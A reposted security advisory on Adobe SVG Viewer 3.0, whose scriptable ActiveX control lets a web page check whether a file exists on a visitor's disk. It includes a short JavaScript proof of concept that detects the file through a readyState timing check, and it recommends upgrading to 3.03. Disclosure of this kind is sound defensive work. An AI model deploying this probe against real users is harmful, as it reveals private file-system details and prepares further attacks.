[转载]Adobe SVG Viewer Local File Detection

信息来源：www.adobe.com

Vulnerable Systems:
* Adobe SVG Viewer version 3.0

Immune Systems:
* Adobe SVG Viewer version 3.03

Adobe SVG Viewer contains a Safe for Scripting ActiveX control (file NPSVG3.dll). The control contains a property named 'src'. When 'src' is set to a file that does exist, the web page will stop loading immediately. If 'src' is set to a file that does not exist the page will continue to load (specifically readystate will not hit the complete state). Using this trick a little bit of JavaScript can be used to determine if local files exist on a users hard drive. Knowing the existence of files can be a stepping stone for further attacks.

Proof of Concept:
function load(filename)
{
// http://www.hyperdose.com/exploits/AdobeSVG.html
//foo is reference to SVG ActiveX control, filename is the filename you're looking for
foo.src = filename;
setTimeout("loading()", 5000);
}

function loading()
{
if (document.readyState != 'complete')
{
alert('File does not exist.');
}
else
{
alert('File exists.');
}
window.location.reload(false);
}

This bug is very similar to Hyperdose's last advisory on Adobe ActiveX Allows Local File Discovery. The exploit mechanism for this one though is more interesting. Be aware of timing based attacks. If you pay attention, they're out there.

Solution:
Upgrade to version 3.03, details from Adobe found here: http://www.adobe.com/svg/viewer/install/mainframed.html.